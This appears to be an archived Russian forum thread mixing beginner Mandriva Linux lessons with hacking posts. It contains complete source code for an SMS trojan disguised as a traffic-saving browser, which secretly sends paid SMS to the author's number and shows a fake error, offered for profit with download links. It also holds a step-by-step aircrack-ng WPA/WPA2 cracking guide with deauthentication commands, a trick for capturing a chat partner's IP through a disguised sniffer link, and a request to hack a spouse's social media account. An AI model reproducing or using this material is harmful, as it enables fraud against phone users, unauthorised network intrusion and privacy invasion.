Теперь нужно указать с каким разрешением будем работать на мониторе, рекомендую выбирать 1024x768 60Гц (или 70Гц), после того как выбрали жмём «Далее».
Следующее у нас настройка многих параметров, которые мы делать не будем, а сделаем это потом, разве, что вы можете сменить часовой пояс, выбрать страну, ну и на этом пока всё, не забываем нажимать «Далее».
На последнем этапе нам предлагаеться установить обновления, но так как наша операционная система не настроена мы отказываемся и выбираем «Нет» и последний раз жмём «Далее».
Всё система установлена, я вас поздравляю, теперь, что бы насладиться работой нужно всего лишь нажать «Перезагрузка» и всё наша операционка готова к настройке.
#-----------------------------------------------------------------------------------------------#
В следующем уроке будем настраивать нашего пингвина (линукс).

< Сообщение отредактировано KmServak -- 22.03.2009 16:32:41 >
УРОК №2 ПО ЛИНУКСУ ДЛЯ НАЧИНАЮЩИХ
Линукс для начинающих (дистрибутив Mandriva 2009 Free)

Итак в предыдущем уроке мы быстро установили дистрибутив Mandriva 2009 Free.
Теперь мы будем его настраивать под себя.
Перед загрузкой дистрибутива будет предложено два варианта загрузки: обычный вход; безопасный режим.
Мы выбираем обычный режим и загружаем наш дистрибутив.
Первый запуск дистрибутив будет предложена форма для регистрации, но мы его пропускаем и нажимаем «Отмена».
Перед нами появляется окно входа в систему и созданный ранее наш пользователь, под которым мы будем заходить (в первом уроке мы говорили, что пользователь root нужен только для установки программ).
Выбрать пользователя можно нажав над человечком мышкой или набрать в поле Username имя пользователя, ну и конечно пароль, который вы сами указали.
Перед вашими экранами вы видите красавца Линукс. Интерфейс похож на Висту но немного продвинутый, больше графических прибомбасов. Если вы поставили на сам компьютер, а не на виртуальную машину, то у вас появляется возможность оценить все (если видеокарта не старая) преимущества графических эффектов.
На рабочем толе вы видите аплет «Рабочий стол» вы его можете двигать мышкой в любую точку экрана. Также внизу вы увидите цифры 1,2,3,4 – это номера рабочих столов (в виндовсе такого нету). Зачем эти рабочие столы нужны, отвечаю: если например у вас открыта программа и вы не хотите её пока видеть, но закрывать её нельзя, или у вас какое-то своё расположение окон, более удобное для вас, то вы можете расположить окна других программ в другом рабочем столе. К этому нужно привыкнуть, потом вы обнаружите, что это очень удобно.
Возле меню в нижнем левом углу расположены ярлыки быстрого запуска, как у виндовс, мы запускаем ярлык «Настройка компьютера». После запуска нам будет предложено ввести пользователя root (это тот пользователь, который может по умолчанию в операционной системе делать всё), вводим пароль и мы видим первую закладку «Управление программами» - здесь вы можете установить, удалить, обновить и даже получить отчёт, какие пакеты используются, а какие вообще не используются, только занимают место.
Вторая вкладка «Онлайновое администрирование» - с помощью этой вкладки, вы можете подключиться к компьютерам Windows, Linux.
Третья вкладка «Оборудование» - тут мы настроить наш дистрибутив, что мы сейчас и сделаем.
Начнём с «Настройки графики» => «Настройка эффектов трёхмерного рабочего стола» - вот эта очень крутая фича, которой завидует даже сама Майкрософт, запускаем и нас сразу система говорит, что необходимо установить пакет mesa-demos, мы его ставим и жмём «Ок». После установки если у вас доступен следующий пункт «Metisse», то мы выбираем и жмём «Ок». Потребуется выйти из системы (не путайте с перезагрузкой) и опять залогиниться, этим вы перегрузите графический сервис и новые графические функции будут доступны.
Теперь ваш рабочий стол на 200% покруче чем хвалёная Виста.
Ну например, нажмите и держите левый Ctrl+ мышкой нажмите левую клавишу и покрутите влево- вправо- вверх – вниз. Также попробуйте запустить какую-то программу и обратите на поведение окон, как плавно и с приколами они открываются, теперь открытое окно попробуйте быстро передвинуть влево, а потом в право, разверните на весь экран, а потом сверните его. Переключать рабочий стол вы можете комбинацией клавиш левый Ctrl+ клавиши стрелки вправо, влево.
Так с графическими эффектами и с некоторым функционалом мы разобрались, теперь приступим к настройке раскладки клавиатуры.
В пункте «Настройка клавиатуры и мыши» => «Настройка раскладки клавиатуры» - запускаем и выбираем раскладку «Русская», также выбираем переключение между раскладками как вам будет удобно, перечень там большой.
Теперь мы можем спокойно перейти и настроить расширение экрана, если нам что-то не устраивает. Это можно сделать с помощью «Настройка графики» => «Настройка графического сервера» - изменяем только расширение монитора, ну и конечно можно сначала нажать кнопку «Проверить» перед использованием, если всё нормально, то тогда сохраняем и жмём кнопку «Выйти». Изменения, которые мы сделали, нужно опять перегрузить графический сервер (нажимаем «Выйти из системы» и заходим опять) для того, чтобы они вступили в силу.
#-----------------------------------------------------------------------------------------------#
Пока всё на этом урок заканчивается, в следующем уроке будет рассказано, про файловую систему.
Дабы помочь автору, опишу .....

Структура файловой системы

/ - корневой каталог
/bin - исполняемые файлы и скрипты
/dev - файлы устройств
/etc - файлы настрое
/home - домашние каталоги пользователей
/mnt -каталог мантирования
/lib - библиотеки
/proc - файлы состояния системы
/root - домашний каталог пользователя root
/sbin - систеьные исполняемые файлы
/usr - приложения и файлы установленные в систему
/var - постоянно изменяемые файлы
/tmp - временные файлы

Группа 9009 представляет:

SMS-Троян или "Заработай на СМС"

Каждый приличный и уважающий себя кодер должен начать зарабатывать на своем мастерстве. Вот мы с тобой и начнем косить американских президентов
на наивных пользователях Интернета.
Ты наверно слышал о такой штуке как СМС-биллинг. Наивные юзеры шлют смс с каким-нибуть пожеланием или текстом как в чат, или заказывают контент.
Искать тебе биллинги прийдется, все уже собрано в одном месте - http://allpublication.ru/sms/ . Выбирай любую и регистрируйся.
Надеюсь, ты уже сбегал и зарегался, а заодно получил свой префикс - тот текст, который мы будем слать в СМС-ке.

Подготовка к кодингу

План - создание трояна для скрытой отсылки смс на платные номера (твои :) Я решил маскировать зловреда под СМС-браузер (ничего не напоминает ?)
Важным пунктом в сегодяшнем меню будет софт для кодинга. Надеюсь ты знаешь, что программы и игры для телефонов (мидлеты) пишутся на языке Java.
Но мы с тобой не будем учить новый ЯП, а воспользуемся простым решением - MidletPascal. Это обычный паскаль, но для телефона, в котором встроены
готовые очень полезные функции. Скачать его можно с официального сайта проги ( http://www.midletpascal.com/ ).
Будем считать, что ты уже скачал и установил MidletPascal.

The Trojan Begins

Для начала создавай новый проект (File -> New Project). В имя проэкта вбивай что-то наподобие SMS_Trojan, в окошке выбирай пункт "Default MIDP project"
и жми "Create". В окне кода появится начальный исходник мидлета:

program SMS_Trojan;
begin
drawText('Hello world!', 0, 0);
repaint;
delay(2000);
end.

Объяснение этих функций есть в справке, потому не будем тратить время на это :) Убирай все от begin до end.
В справке есть готовый пример отсылки смс:

begin
if not SmsStartSend('sms://+5550000', 'Hello!') then Halt;
while SmsIsSending do // wait for the message to be sent
Delay(100);
if not SmsWasSuccessfull then Halt; // check if the message was sent successfully
end.

SmsStartSend - функция отправки СМС
SmsIsSending - проверяет, осылается соощение или нет
SmsWasSuccessfull - проверяет, было ли успешо отослано последнее соощение
Delay - останавливает исполнение мидлета на указанное количество миллисекунд

Этим примером лучше не пользоваться из-за его простоты, т.к. жертва почувствует подвох, когда прога просто вырубится.
А нам нужно, чтобы все было красиво :) Поэтому мы создадим интерфейс для жертвы, чтобы она чувствовала себя уютно, пока ее деньги идут нам.
ГУИ:
- Главное меню с 4 пунктами
- Пункты "Справка" и "Про программу"

Мы будем использовать такие константы в мидлете:

const
SendErr='Ошибка 109. Возможно не настроена сеть или оператор отключил службу SMS. Попробуйте воспользоваться услугой позже.';
AboutStr='Made by Butlik, 2009';
HelpStr='С помощью браузера FastNet вы сможете экономить 95% трафика, так как интернет будет работать через систему СМС.';
NUMBERS=1;

SendErr - Сообщение, которое появится после удачной отсылки всех СМС
AboutStr - Какой-то левый копирайт :) Что же это будет за мега браузер, если в нем не будет неписано чей он. Это будет подозрительно.
HelpStr - Справка ;) Тут должна работать фантазия.
NUMBERS - количество номеров, на которые будет идти отправка СМС.

Мы будем использовать такие переменные в мидлете:

var
numb,text:array[1..NUMBERS] of string; // массивы строк с текстами сообщений и номерами
p:array[1..4] of integer; // массив хэндлов пунктов меню
m:array[1..4] of string; // массив строк с названиями пунктов меню
clicked,
callmenu,
exit : command; // команды для софт клавиш
label_id, // хэндл надписей (справки, ошибки и т.д.)
i,d : integer; // счетчики

Создадим процедуру динамического создания главного меню:

//----------------------------------------------------------------------------------------------------------------------------------------
procedure mainmenu;
var
click: Command; // элемент "command" - по сути это назначение кнопки для софт клавиши
begin
showMenu('Выбери действие', CH_IMPLICIT); // покажем меню с заголовком "Выбери действие", тип - CH_IMPLICIT - обычное меню (подробнее в справке)

for d:=1 to 4 do // в этом цикле мы
p[d] := menuAppendString(m[d]); // добавляем в меню пункты с названиями из массива строк m, и сохраняем ихние хэндлы в масив integer'ов p

repeat
delay(100); // пауза

click := GetClickedCommand; // получаем нажатую клавишу

until click <> EmptyCommand; // в этом цикле мы ждем, пока будет нажата любая софт клавиша, для которой есть элемент "command"
end;
//----------------------------------------------------------------------------------------------------------------------------------------

Теперь напишем сердце троя - процедура отсылки СМС:

//----------------------------------------------------------------------------------------------------------------------------------------
procedure SendMoneyToMe;
begin
for d:=1 to NUMBERS do // цикл отсылки
begin
if not SmsStartSend('sms://'+numb[d], text[d]) // попытка послать собощение

then Halt; // если она была неудачная, то вырубимся

while SmsIsSending do // пока смс-ка посылается
Delay(100); // ждем :)
end;
end;
//----------------------------------------------------------------------------------------------------------------------------------------

Теперь напишем основу троя (для понимания разбита на части) :

//----------------------------------------------------------------------------------------------------------------------------------------
m[1]:='Начать роботу'; // Это все
m[2]:='Про программу'; // заполнение массива
m[3]:='Справка'; // пунктов
m[4]:='Выход'; // меню

Numb[1]:='1234'; // А это заполнение массивов с номерами
text[1]:='7777'; // и текстами сообщений

Repeat // здесь главный начинается цикл, в котором проверяем, была ли нажата кнопка "Выход"
mainmenu; // вызоваем функцию создания меню

for d:=1 to 4 do // в том цикле мы определяем, какой пункт меню был выбран
if MenuIsSelected(p[d]) then i:=d; // с помощью функции MenuIsSelected

ClearForm; // полностью очищаем форму от всех менюшек, лэйблов и т.д.

// в зависимости от i, выбираем, какое действие нам сделать

if i=1 then // если был выбран пункт меню "Начать роботу"
begin
SendMoneyToMe; // отсылаем смс-ки
label_id := FormAddString(SendErr); //показываем ошибку :)
end;

if i=2 then // если был выбран пункт меню "Про программу"
label_id := FormAddString(AboutStr); // показываем строку с about'ом

if i=3 then // если был выбран пункт меню "Справка"
label_id := FormAddString(HelpStr); // показываем строку с help'ом

if i=4 then // если был выбран пункт меню "Выход"
halt; // вырубаемся

ShowForm; // показываем форму

callmenu := CreateCommand('Меню', CM_SCREEN, 1); // создаем команду "Меню" для софт клавиши
AddCommand(callmenu); // и добавляем ее на дисплей

exit := CreateCommand('Выход', CM_EXIT, 2); // создаем команду "Выход" для софт клавиши
AddCommand(exit); // и добавляем ее на дисплей

clicked := GetClickedCommand; // сохраняем нажатую кнопку в переменую clicked

Repeat // цикл, в котором мидлет ожидает нажатия софт клавиши

Delay(100); // пауза

clicked := GetClickedCommand; // сохраняем нажатую кнопку в переменую clicked

If clicked = exit Then Break; // если была нажата кнопка "Выход", то выходим из этого цикла

Until clicked = callmenu; // условие - повторять, пока не нажата кнопка "Меню"

Until clicked = exit; // условие - повторять, пока не нажата кнопка "Выход"

// если мы здесь, значит юзверь все-таки нажал на "Выход"

Delay(1000); // ждем 1 секунду перед выходом
//----------------------------------------------------------------------------------------------------------------------------------------

Окей, хеппи-энд. (с)

Для особо ленивых (да, я знаю, это ты), я выложил весь проект с иконкой, скомпилиным jar и всем остальным.

http://slil.ru/27340659
http://rapidshare.com/files/214210564/S … n.rar.html
http://dump.ru/file/2307280
http://ВНИМАНИЕ! Тут должна была быть ссылка на depositfiles.com, скорее всего это вирус или троян!/files/52cm0535l

Итоги:
- Софт на мобилу - это просто!
- Никто тебя не ограничивает - пиши хоть игры
- Деньги можно зарабатывать, раздавая линк с чудо-браузером

Удачи !

Вот нашел статейку насчет wpa/wpa2
(оригинальный материал находится по адресу
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
перевод by Lokk, http://www.Lokk.ru
Введение

Это руководство объясняет, как взламывать сети, защищенные WPA/WPA2 с использованием Pre-Shared Key (PSK). WPA/WPA2 поддерживает много других способов аутентификации, но aircrack-ng взламывает только PSK, так что убедитесь, что airodump-ng показывает сеть с типом аутентификации PSK. В противном случае даже не пытайтесь в нее проникнуть.

Существует важное различие между взломом WPA/WPA2 и WEP. Если в WEP для ускорения процесса взлома используются статистические методы, WPA можно взломать только методом прямого перебора. Это происходит из-за отсутствия постоянного ключа, поэтому сбор начальных векторов (IV) отнюдь не ускорит процесс взлома, как это было бы при атаке на WEP. Единственный способ получить нужную информацию – начать перехват пакетов в момент установки соединения между клиентом и AP. Установка соединения происходит в тот момент, когда клиент входит в сеть (это не совсем верно, но в контексте данного документа, будем руководствоваться этим). Длина PSK может составлять от 8 до 63 символов, и чем она больше, тем меньше вероятность успешного взлома.

Но не все так безнадежно. В случае, если ключ является словарным словом или же менее 8 символов, взлом возможен. Отсюда, кстати, понятно, как создать неломаемую сеть – достаточно использовать WPA/WPA2 и ключ длиной 63 байта, состоящий из случайного набора букв, цифр и псевдосимволов.

Полный перебор – занятие не из легких. Поскольку требуются серьезные вычисления, компьютер может проверять от 50 до 300 ключей в секунду, в зависимости от мощности процессора. Перебор достаточно большого словаря может занять часы, если не дни, а если вы хотите сгенерировать свой собственный файл словаря, который включает в себя все комбинации букв, цифр и псевдосимволов, воспользуйтесь калькулятором времени перебора (http://lastbit.com/pswcalc.asp). Например, перебор пароля длиной 6 символов, состоящего из букв верхнего, нижнего регистров и цифр, займет 64 часа, а полный перебор уже 7-и символьного пароля – шесть месяцев. Думаю, не стоит говорить про 29 лет на перебор 8 символов.

Различий между взломом WPA и WPA2 нет, там используется одинаковая аутентификация, поэтому технология та же.

Условия работы

• вы используете пропатченные драйвера, умеющие делать инжекцию (http://www.aircrack-ng.org/doku.php?id=injection_test – здесь рассказано, как это проверить);
• вы достаточно близки к клиенту, чтобы отправлять и получать от него данные. Запомните, то, что вы можете получать пакеты от AP, еще не значит, что у вас есть возможность отправлять на нее данные. Мощность точки выше мощности вашей карты. Проверить возможность отправки пакетов можно по линку, указанному в пункте выше;
• вы используете aircrack-ng 0.9 stable (иначе некоторые параметры могут быть другими).

Проверьте, что все условия соблюдены, иначе нижеприведенные советы вряд ли вам помогут. Также, не забудьте заменить ath0 на имя интерфейса вашей беспроводной карточки.

Окружение

Чтобы проверить данное руководство в домашних условиях, вам необходимо иметь две беспроводные карточки. Мы используем следующие устройства:

• Атакуемый клиент с WPA2:
- MAC: 00:0F:B5:FD:FB:C2
• AP:
- ESSID: teddy
- MAC: 00:14:6C:7E:40:80
- Channel: 9
• Система AirCrack-ng:
- MAC: 00:0F:B5:88:AC:82

Решение

Предисловие

Наша цель – захватить пакеты во время установления защищенного соединения и использовать aircrack-ng для взлома PSK. Это можно сделать активным и пассивным способом. Активный заключается в посылке деаутентификационного пакета клиенту, пассивный — в ожидании, пока клиент начнет устанавливать WPA/WPA2 соединение самостоятельно. Преимущество пассивного способа в том, что отсутствует необходимость в инжекции, поэтому реализация атаки возможна и под Windows.

Вот наши основные шаги:
– запустить беспроводной интерфейс в режиме мониторинга на AP канале;
– запустить на этом же канале airodump-ng с фильтром по bssid;
– использовать aireplay-ng, чтобы деаутентифицировать беспроводного клиента;
– использовать aircrack-ng для взлома PSK ключа.

Шаг 1: запуск беспроводного интерфейса в режиме мониторинга

Итак, нам необходимо включить режим мониторинга. В этом режиме беспроводная карта ловит все пакеты в эфире, вместо обычного режима, когда она «слышит» только то, что адресовано ей. Перехватывая каждый пакет, мы можем отловить момент 4-х этапной WPA/WPA2 аутентификации.

Для начала остановим ath0:

# airmon-ng stop ath0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Убедимся, что нет других athX интерфейсов:

# iwconfig

lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.

Если еще какие-то athX присутствуют, остановите их тоже. Теперь установим беспроводную карту на канал 9 в режиме мониторинга:

# airmon-ng start wifi0 9

В этой команде мы используем «wifi0» вместо привычного «ath0», поскольку используем драйвера madwifi-ng. Ответом будет что-то вроде:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Обратите внимание на строчку monitor mode enabled. Чтобы проверить, что интерфейс правильно сконфигурирован, запустите:

# iwconfig

lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Вы видите, что ath0 работает в режиме мониторинга, на частоте 2.452, что соответствует 9 каналу, и что в AP стоит MAC-адрес вашей карты. В отличии от всех остальных, только драйвера madwifi-ng показывают ваш адрес в поле AP. Итак, все отлично. Очень важным моментом является проверка всех данных перед непосредственным процессом взлома. Если что-то не так, дальнейшие шаги могут оказаться бесполезными. Убедиться в соответствии частоты беспроводной карточки каналу можно по этому адресу: [link=http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels.]http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels.[/link]

Шаг 2: airodump-ng

Цель этого шага – отловить момент установки безопасного соединения с AP.

# airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

-9 – это канал, на котором работает беспроводная сеть
--bssid 00:14:6C:7E:40:80 – MAC адрес AP. Этот параметр отфильтрует “левый” трафик
-w psk – имя файла, в который мы будут записываться пойманные IV
ath0 – имя нашего беспроводного интерфейса

Важно: не используйте параметр --ivs. Вы должны захватывать пакеты целиком. Итак, в случае, если к точке присоединен клиент, на экране появится что-то вроде этого:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

А если клиентов в данный момент нет, то это:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

Уточним, что иногда для перехвата момента установки соединения приходится совершать дополнительные телодвижения. Ваша карточка должна быть в том же режиме, что AP и клиентское устройство. Например, если ваша карточка в режиме B, а клиент – в режиме G, то отловить аутентификацию не получится. Также, иногда бывает нужно выставить ту же скорость, например 11 Мб или 54 Мб. В общем, если не удалось перехватить установку соединение сразу, следует поэкспериментировать.

Шаг 3: используем aireplay-ng, чтобы отсоединить клиента.

Этот шаг необязателен и выполняется лишь в том случае, когда вы хотите ускорить процесс взлома. Естественно, для выполнения нижеприведенных действий необходимо, чтобы к точке был присоединен хотя бы один клиент. Если в данный момент никаких беспроводных клиентов не наблюдается, расслабьтесь и переходите сразу к следующему шагу. Конечно, если в дальнейшем беспроводной клиент появится, никто не мешает вам вернуться и выполнить все описанные ниже команды.

Итак, на данном этапе мы посылаем беспроводному клиенту сообщение о том, что он больше не ассоциирован с AP. Клиент попытается установить соединение заново и пошлет именно те пакеты, которые нам нужны.

Основываясь на полученных данных из предыдущего шага, выполним на другой консоли следующую команду:

# aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

-0 означает деаутентификацию
1 – количество деаутентификационных пакетов (можно увеличить)
-a 00:14:6C:7E:40:80 – MAC-адрес AP
-c 00:0F:B5:FD:FB:C2 – MAC-адрес отсекаемого клиента
ath0 – имя нашей беспроводной карточки.

Ответ должен быть таким:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

Деаутентификационный пакет шлется напрямую с вашего компьютера на компьютер клиента, поэтому убедитесь, что вы находитесь достаточно близко к последнему.

Шаг 4: запускаем aircrack-ng и ломаем PSK ключ.

Цель данного шага – попытаться взломать PSK ключ путем подбора по словарю. Небольшой словарик идет в комплекте с aircrack-ng (password.lst), более объемные словари можно легко найти в сети или сгенерировать самостоятельно при помощи известной программы John the Ripper.

Открываем новую консоль и запускаем:

# aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

-w password.lst назначает имя файла со словарем
psk*.cap назначает имя файла с перехваченными пакетами. Маска “*” используется, поскольку файл может быть не один.

В случае, если аутентификационные пакеты не найдены, вывод будет примерно следующим:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Read 1827 packets.
No valid WPA handshakes found.
Если это произошло, попробуйте повторить третий шаг и заново выбить беспроводного клиента из сети, чтобы он повторил процедуру установления соединения. Если вы использовали пассивный метод сбора пакетов, ждите дальше, пока не появится клиент, устанавливающий соединение. Вывод в случае нахождения подходящих пакетов будет таким:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target.

С этого момента aircrack-ng может начать взлом PSK ключа. В зависимости от скорости вашего процессора и размера словаря, этот процесс может занять часы или дни. Успешный взлом ключа выглядит так:

Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E

B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98

CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40

FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E

2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Недавно один мой знакомый тоже заинтересовался: а какой ай-пи у моего асечного визави?

И тут выяснилось, что единственный надежный способ:
- уговорить своего незнакомца принять от тебя файл по асе
- зпустить CMD
- дать в нем netstat -an
- запустить передачу файла
- после того как передача началась, дать опять в CMD команду netstat -an
- поиграть в детскую игру "найди 10 отличий" и найти -таки новую строчку во втором листинге. В колонке "внешний адрес" (третья) и будет искомый айпишник.
Правда, все усилия могут пойти насмарку, если визави использует анонимизатор (тунеллирование) или провайдер всех выпускает через собственный прокси, не выдавая юзерам публичных адресов. В этом случае мы узнаем лишь адрес публичной прокси....

Другой способ - это подсунуть под видом ссылки якобы на какой-то прикол/фото/еще что-то, ссылку на сниффер и посмотреть его лог (например, [Ссылки могут видеть только зарегистрированные пользователи. ] или [Ссылки могут видеть только зарегистрированные пользователи. ] и посмотреть адрес [Ссылки могут видеть только зарегистрированные пользователи. ])
Засада с проксями остается....

Кроме этого, с некоторыми клиентами иногда помогает просмотр в самой миранде или утилитами [Ссылки могут видеть только зарегистрированные пользователи. ], [Ссылки могут видеть только зарегистрированные пользователи. ] и uin2ip (в нете в основном трояны, которые либо косят, либо встроены в эту прогу).

Ну и не забывайте, что знание IP-адреса не всегда может помочь в определении местоположения вашего собеседника......

Удачи!

+1

8

Добрый вечер! Помогите мне  Пожалусто  найти коды или паттч для онлаин игры Фрагория .Или подскажите где их взять.
Зарание благодарю.  http://i066.radikal.ru/1105/37/0da6cb64abc6.gif  http://i066.radikal.ru/1105/37/0da6cb64abc6.gif  http://i066.radikal.ru/1105/37/0da6cb64abc6.gif
http://i016.radikal.ru/1105/47/7a4942ef74e1.gif  http://i016.radikal.ru/1105/47/7a4942ef74e1.gif  http://i016.radikal.ru/1105/47/7a4942ef74e1.gif
[взломанный сайт]  [взломанный сайт]  [взломанный сайт]  [взломанный сайт]  [взломанный сайт]

0

9

подскажите как взломать страницу в одноклассниках у мужа пожалуста рушится семья)))))))))

0

10

Ангелина написал(а):

Добрый вечер! Помогите мне  Пожалусто  найти коды или паттч для онлаин игры Фрагория .Или подскажите где их взять.
Зарание благодарю.

В гугл вбейте Патч для Фрагория

0

11

Автору огромный Respekt хоть и дошел только до 5-того урока но уже очень заинтересовался ) [взломанный сайт]

0


Вы здесь » Ключи к играм » Архив » программы для взлома ))


Рейтинг форумов | Создать форум бесплатно